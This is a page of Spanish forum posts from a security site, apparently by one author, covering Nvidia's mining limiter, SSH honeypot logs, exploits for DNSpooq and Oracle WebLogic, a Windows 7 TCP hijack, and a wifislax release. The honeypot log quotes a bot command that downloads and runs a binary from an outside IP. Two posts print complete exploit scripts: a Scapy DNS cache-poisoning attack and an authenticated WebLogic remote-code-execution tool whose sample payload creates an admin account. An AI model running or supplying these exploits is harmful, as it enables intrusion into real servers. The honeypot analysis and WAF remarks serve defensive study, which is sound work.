elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 36
51  Informática / Hardware / Nvidia limitará el uso de la RTX 3060 para el minado de Ethereum y lanzará una tarjeta para la minería de criptomonedas en: 19 Febrero 2021, 22:00 pm
Nvidia ha anunciado que las GeForce RTX 3060 se pondrán a la venta a finales de febrero con unos drivers diseñados específicamente para detectar algoritmos de minado de Ethereum (o cualquier otra moneda) y reducir el hash rate al 50 %. De esta forma el fabricante busca desincentivar la compra de esta tarjeta gráfica por parte de los profesionales que se dedican a esta labor. En su lugar, Nvidia les ofrecerá un nuevo producto llamado CMP (Cryptocurrency Mining Processor) destinado a la minería de criptomonedas.

https://blogs.nvidia.com/blog/2021/02/18/geforce-cmp/

“Diseñamos las GPU GeForce para los jugadores y los jugadores quieren más”, dice Matt Wuebbling, director de marketing global de Nvidia. “Sin embargo, las GPU de Nvidia se pueden programar. Los usuarios descubren constantemente nuevas aplicaciones para ellas, desde la simulación meteorológica y la secuenciación de genes hasta el deep learning y la robótica. La minería de criptomonedas también es una de estas actividades”.

“Con el lanzamiento de la GeForce RTX 3060 el 25 de febrero, daremos un importante paso para ayudar a garantizar que las tarjetas gráficas GeForce terminen en manos de los jugadores”, añade Wuebbling. Este esfuerzo por parte de Nvidia pasa por lanzar la tarjeta con el mencionado driver instalado que limita la tasa de hash, es decir, su eficiencia a la hora de minar criptomonedas. De esta forma la RTX 3060, que se presenta como una tarjeta para el gran público, será un producto inútil o muy poco interesante para los mineros.

En declaraciones a PC Gamer, un portavoz de Nvidia afirma que su limitador de minado de criptomonedas no puede ser hackeado.

Pero Nvidia no quiere renunciar a los ingresos que generan los mineros de criptomonedas, así que ha diseñado un nuevo producto llamado CMP. Este procesador presenta un mejor rendimiento y la eficiencia para la minería de criptomonedas, no procesa gráficos y no tiene puerto para el monitor, una ausencia que mejora el flujo de aire y permite almacenar un mayor número de unidades. Además, la compañía ha ajustado el voltaje y las frecuencias para reducir los requisitos de energía.

Nvidia afirma que las unidades CMP no cumplen con los requisitos de las tarjetas gráficas GeForce, así que su lanzamiento "no afectará a la disponibilidad” de las GPU para jugadores. Las tarjetas CMP se pondrán a la venta en diferentes modelos a lo largo del primer y segundo trimestre del año y serán distribuidas por los habituales socios de Nvidia (ASUS, EVGA, Gigabyte, MSI, Palit...).


Fuente:
52  Seguridad Informática / Bugs y Exploits / Logs interesantes Honeypot SSH (Cowrie) en: 17 Febrero 2021, 16:07 pm
Jugando con los honeypots he visto algunas cosas interesantes, aunque todo son herramientas automatizadas y no ataques de personales "reales", son todo bots.

Pero en log que pongo pues una ip China:
IP China
https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54

Se bajó un binario llamado 80

Citar
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80

binario 80 ELF
https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection

gcc.pid ????
https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb

Top 10 comandos más utilizados:



En otra máquina resulados bastante diferentes:



Adjunto el log

Citar
2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds

En Twitter y en el blog he publicado algunas de las combinaciones de contraseñas más habituales

Citar
############
Top 20 COWRIE Usernames for 2021-02-11
############
   3288 b'root'|b'password'
    751 b'admin'|b'password'
    727 b'root'|b'none'
    426 b'admin'|b'none'
    252 b'Admin'|b'password'
    140 b'user'|b'password'
    124 b'Admin'|b'none'
    118 b'ubuntu'|b'password'
     96 b'nproc'|b'password'
     91 b'test'|b'password'
     80 b'postgres'|b'password'
     46 b'nagios'|b'password'
     42 b'oracle'|b'password'
     39 b'guest'|b'password'
     38 b'support'|b'password'
     38 b'Administrator'|b'password'
     30 b'git'|b'password'
     28 b'deploy'|b'password'
     24 b'ftpuser'|b'password'
     22 b'user'|b'none'



En otra ip resultados no exactamente iguales:


Y algunos gráficos completos (país, etc)

Citar
1- Irlanda
2- Rusia
3- Panamá

688 ip's diferentes en apenas 9 horas
53  Seguridad Informática / Bugs y Exploits / PoC para #DNSpooq: cache poisoning en en dnsmasq CVE-2020-25686 - CVE-2020-25684 - CVE-2020-25685 en: 25 Enero 2021, 22:49 pm
PoC para DNSpooq - dnsmasq cache poisoning CVE-2020-25686 - CVE-2020-25684 - CVE-2020-25685 por Teppei Fukuda @knqyf263

For educational purposes only

https://github.com/knqyf263/dnspooq

Código:
$ docker-compose exec attacker bash
bash-5.0# python exploit.py



exploit.py

Código
  1. #!/usr/bin/python
  2.  
  3. import itertools
  4. from scapy.all import *
  5.  
  6.  
  7. def patch(dns_frame: bytearray, pseudo_hdr: bytes, dns_id: int, dport: int):
  8.    # set dport
  9.    dns_frame[36] = (dport >> 8) & 0xFF
  10.    dns_frame[37] = dport & 0xFF
  11.  
  12.    # set dns_id
  13.    dns_frame[42] = (dns_id >> 8) & 0xFF
  14.    dns_frame[43] = dns_id & 0xFF
  15.  
  16.    # reset checksum
  17.    dns_frame[40] = 0x00
  18.    dns_frame[41] = 0x00
  19.  
  20.    # calc new checksum
  21.    ck = checksum(pseudo_hdr + dns_frame[34:])
  22.    if ck == 0:
  23.        ck = 0xFFFF
  24.    cs = struct.pack("!H", ck)
  25.    dns_frame[40] = cs[0]
  26.    dns_frame[41] = cs[1]
  27.  
  28.  
  29. ftabsiz = 150
  30. qname = "example.com"
  31. target = "google.com"
  32. poison = "169.254.169.254"
  33.  
  34. attacker = "10.10.0.3"
  35. forwarder = "10.10.0.2"
  36. cache = "10.10.0.4"
  37.  
  38. txids = range(1, 2**16)
  39. sports = range(1025, 2**16)
  40. candidates = itertools.product(txids, sports)
  41.  
  42. # DNS query
  43. qd = DNSQR(qname=qname, qtype="A", qclass='IN')
  44. req = IP(dst=forwarder) / UDP(dport=53) / DNS(id=0, rd=1, qd=qd)
  45. dns_layer = req[DNS]
  46.  
  47. # Socket
  48. s2 = conf.L2socket(iface="eth0")
  49. s3 = conf.L3socket(iface="eth0")
  50.  
  51. print("Querying non-cached names...")
  52. for i in range(ftabsiz):
  53.    dns_layer.id = i
  54.    s3.send(req)
  55.  
  56. print("Generating spoofed packets...")
  57. res = Ether() / \
  58.      IP(src=cache, dst=forwarder) / \
  59.      UDP(sport=53, dport=0) / \
  60.      DNS(id=0, qr=1, ra=1, qd=qd,
  61.          an=DNSRR(rrname=qname, ttl=900, rdata=target, type="CNAME", rclass="IN") /
  62.             DNSRR(rrname=target, ttl=900, rdata=poison, type="A", rclass="IN"))
  63.  
  64. # Optimization
  65. dns_frame = bytearray(raw(res))
  66. pseudo_hdr = struct.pack(
  67.    "!4s4sHH",
  68.    inet_pton(socket.AF_INET, res["IP"].src),
  69.    inet_pton(socket.AF_INET, res["IP"].dst),
  70.    socket.IPPROTO_UDP,
  71.    len(dns_frame[34:]),
  72. )
  73.  
  74. verify = IP(dst=forwarder) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=target, qtype="A", qclass='IN'))
  75.  
  76. start_time = time.time()
  77.  
  78. n_pkts = 0
  79. for txid, sport in candidates:
  80.    # Update TXID and UDP dst port
  81.    patch(dns_frame, pseudo_hdr, txid, sport)
  82.    s2.send(dns_frame)
  83.  
  84.    n_pkts += 1
  85.    if sport == 65535:
  86.        res = sr1(verify, verbose=0, iface="eth0", timeout=0.01)
  87.        if res is not None and res.haslayer(DNSRR):
  88.            print(f"Poisoned: {res[DNSRR].rrname} => {res[DNSRR].rdata}")
  89.            break
  90.  
  91. end_time = time.time()
  92. print(f"sent {n_pkts} responses in {end_time - start_time:.3f} seconds")
  93.  
54  Seguridad Informática / Bugs y Exploits / Oracle WebLogic Server RCE JNDI - CVE-2021-2109 en: 25 Enero 2021, 22:44 pm
- Exploit en (python3) JndiBinding  por Photubias


Código
  1. # Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
  2. # Date: 2021-01-21
  3. # Exploit Author: Photubias
  4. # Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
  5. # Vendor Homepage: https://www.oracle.com
  6. # Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
  7. # Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
  8. # CVE: CVE-2021-2109
  9.  
  10. #!/usr/bin/env python3
  11. '''    
  12.  Copyright 2021 Photubias(c)
  13.  
  14.        This program is free software: you can redistribute it and/or modify
  15.        it under the terms of the GNU General Public License as published by
  16.        the Free Software Foundation, either version 3 of the License, or
  17.        (at your option) any later version.
  18.  
  19.        This program is distributed in the hope that it will be useful,
  20.        but WITHOUT ANY WARRANTY; without even the implied warranty of
  21.        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  22.        GNU General Public License for more details.
  23.  
  24.        You should have received a copy of the GNU General Public License
  25.        along with this program.  If not, see <http://www.gnu.org/licenses/>.
  26.  
  27.        File name CVE-2021-2109.py
  28.        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
  29.  
  30.        This is a native implementation without requirements, written in Python 3.
  31.        Works equally well on Windows as Linux (as MacOS, probably ;-)
  32.  
  33.        Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
  34.         from https://github.com/welk1n/JNDI-Injection-Exploit
  35.         to be in the same folder
  36. '''
  37. import urllib.request, urllib.parse, http.cookiejar, ssl
  38. import sys, os, optparse, subprocess, threading, time
  39.  
  40. ## Static vars; change at will, but recommend leaving as is
  41. sURL = 'http://192.168.0.100:7001'
  42. iTimeout = 5
  43. oRun = None
  44.  
  45. ## Ignore unsigned certs, if any because WebLogic is default HTTP
  46. ssl._create_default_https_context = ssl._create_unverified_context
  47.  
  48. class runJar(threading.Thread):
  49.    def __init__(self, sJarFile, sCMD, sAddress):
  50.        self.stdout = []
  51.        self.stderr = ''
  52.        self.cmd = sCMD
  53.        self.addr = sAddress
  54.        self.jarfile = sJarFile
  55.        self.proc = None
  56.        threading.Thread.__init__(self)
  57.  
  58.    def run(self):
  59.        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
  60.        for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
  61.        for line in iter(self.proc.stderr.readline, ''): self.stderr += line
  62.  
  63.  
  64. def findJNDI():
  65.    sCurDir = os.getcwd()
  66.    sFile = ''
  67.    for file in os.listdir(sCurDir):
  68.        if 'JNDI' in file and '.jar' in file:
  69.            sFile = file
  70.    print('[+] Found and using ' + sFile)
  71.    return sFile
  72.  
  73. def findJAVA(bVerbose):
  74.    try:
  75.        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
  76.    except:
  77.        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
  78.    sResult = list(oProc.stdout)[0].decode()
  79.    if bVerbose: print('[+] Found Java: ' + sResult)
  80.  
  81. def checkParams(options, args):
  82.    if args: sHost = args[0]
  83.    else:
  84.        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
  85.        if sHost == '': sHost = sURL
  86.        if sHost[-1:] == '/': sHost = sHost[:-1]
  87.        if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
  88.    if options.username: sUser = options.username
  89.    else:
  90.        sUser = input('[?] Username [weblogic] : ')
  91.        if sUser == '': sUser = 'weblogic'
  92.    if options.password: sPass = options.password
  93.    else:
  94.        sPass = input('[?] Password [Passw0rd-] : ')
  95.        if sPass == '': sPass = 'Passw0rd-'
  96.    if options.command: sCMD = options.command
  97.    else:
  98.        sCMD = input('[?] Command to run [calc] : ')
  99.        if sCMD == '': sCMD = 'calc'
  100.    if options.listenaddr: sLHOST = options.listenaddr
  101.    else:
  102.        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
  103.        if sLHOST == '': sLHOST = '192.168.0.10'
  104.    if options.verbose: bVerbose = True
  105.    else: bVerbose = False
  106.    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)
  107.  
  108. def startListener(sJarFile, sCMD, sAddress, bVerbose):
  109.    global oRun
  110.    oRun = runJar(sJarFile, sCMD, sAddress)
  111.    oRun.start()
  112.    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
  113.    oRun.join(3)
  114.    if not oRun.stderr == '':
  115.        exit('[-] Error starting Java listener:\n' + oRun.stderr)
  116.    bThisLine=False
  117.    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
  118.    for line in oRun.stdout:
  119.        if bThisLine: return line.split('/')[3].replace('\n','')
  120.        if 'JDK 1.8' in line: bThisLine = True
  121.  
  122. def endIt():
  123.    global oRun
  124.    print('[+] Closing threads')
  125.    if oRun: oRun.proc.terminate()
  126.    exit(0)
  127.  
  128. def main():
  129.    usage = (
  130.        'usage: %prog [options] URL \n'
  131.        ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
  132.        ' in the current working folder\n'
  133.        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
  134.        'Only works when hacker is reachable via an IPv4 address\n'
  135.        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
  136.        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
  137.        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
  138.        )
  139.  
  140.    parser = optparse.OptionParser(usage=usage)
  141.    parser.add_option('--username', '-u', dest='username')
  142.    parser.add_option('--password', '-p', dest='password')
  143.    parser.add_option('--command', '-c', dest='command')
  144.    parser.add_option('--listen', '-l', dest='listenaddr')
  145.    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)
  146.  
  147.    ## Get or ask for the vars
  148.    (options, args) = parser.parse_args()
  149.    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)
  150.  
  151.    ## Verify Java and JAR file
  152.    sJarFile = findJNDI()
  153.    findJAVA(bVerbose)
  154.  
  155.    ## Keep track of cookies between requests
  156.    cj = http.cookiejar.CookieJar()
  157.    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
  158.  
  159.    print('[+] Verifying reachability')
  160.    ## Get the cookie
  161.    oRequest = urllib.request.Request(url = sHost + '/console/')
  162.    oResponse = oOpener.open(oRequest, timeout = iTimeout)
  163.    for c in cj:
  164.        if c.name == 'ADMINCONSOLESESSION':
  165.            if bVerbose: print('[+] Got cookie "' + c.value + '"')
  166.  
  167.    ## Logging in
  168.    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
  169.    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
  170.    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
  171.    oResponse = oOpener.open(oRequest, timeout = iTimeout)
  172.    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
  173.    bSuccess = True
  174.    for line in sResult:
  175.        if 'Authentication Denied' in line: bSuccess = False
  176.    if bSuccess: print('[+] Succesfully logged in!\n')
  177.    else: exit('[-] Authentication Denied')
  178.  
  179.    ## Launch the LDAP listener and retrieve the random endpoint value
  180.    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
  181.    if bVerbose: print('[+] Got Java value: ' + sRandom)
  182.  
  183.    ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1"
  184.    print('\n[+] Firing exploit now, hold on')
  185.    ##  http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
  186.    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
  187.    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
  188.    if bVerbose: print('[!] Using URL ' + sFullUrl)
  189.    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
  190.    oResponse = oOpener.open(oRequest, timeout = iTimeout)
  191.    time.sleep(5)
  192.    bExploitWorked = False
  193.    for line in oRun.stdout:
  194.        if 'Log a request' in line: bExploitWorked = True
  195.        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
  196.    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
  197.    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
  198.    if bVerbose: print(oRun.stderr)
  199.    endIt()
  200.  
  201. if __name__ == "__main__":
  202.    try: main()
  203.    except KeyboardInterrupt: endIt()

Cuidado peticiones tipo:

Código:
GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/hacked;AdminServer-)

Ya están saliendo varias reglas para WAF.
55  Seguridad Informática / Bugs y Exploits / Secuestro TCP/IP Windows 7 totalmente parchaedo en: 25 Enero 2021, 22:41 pm
El secuestro ciego de TCP / IP sigue vivo en Windows 7… y no solo. Esta versión de Windows es sin duda uno de los objetivos más "jugosos" a pesar de que el 14 de enero de 2020 fue el EOL (fin de vida útil) oficial para ella. Según varios datos, Windows 7 tiene alrededor del 25% del mercado de sistemas operativos (SO) y sigue siendo el segundo sistema operativo de escritorio más popular del mundo.

Sólo funciona con protocolos ampliamente implementados que no cifran el tráfico, por ejemplo, FTP, SMTP, HTTP, DNS, IMAP

¿Dónde está el error?

En la implementación de la pila TCP / IP para Windows 7, IP_ID es un contador global.

Tool - PoC
http://site.pi3.com.pl/exp/devil_pi3.c

Fuente:
http://blog.pi3.com.pl/?p=850
56  Seguridad Informática / Hacking Wireless / Disponible wifislax64-2.4-final para descargar en: 21 Enero 2021, 20:57 pm
Se sigue utilizando como base slackware64-14.2 , con todos sus parches de seguridad al día.
Esta iso es un punto de control para la versión estable , se han actualizado todos los paquetes base , como firmwares , kernel … navegador etc.

Como kernel sale con linux-5.4.91 LTS
Como navegador , trae el recien estrenado chrome 88 , que ademas de muchos parches de seguridad , han eliminado finalmente el soporte de flash player.



Seguramente sera la ultima versión de wifislax con kde4 y slackware64-14.2

Changelog

Citar
20/01/2021
01 - Actualizado kernel 5.4.89 --> 5.4.91
02 - Actualizados firmwares de sistema
03 - Actualizado chrome-85.0.4183.121 --> 88.0.4324.96
04 - Actualizado bettercap-2.28 --> 2.29
05 - Actualizado airgeddon-10.31 --> 10.40

12/01/2021
01 - Actualizado kernel 5.4.88 --> 5.4.89
02 - Actualizado wpscan-3.8.12 --> 3.8.13
03 - Modificado hostapd-2.9 con mas opciones.

06/01/2021
01 - Actualizado kernel 5.4.87 --> 5.4.88
02 - Actualizados firmwares de sistema
03 - Mejorado wallpaper island por conca
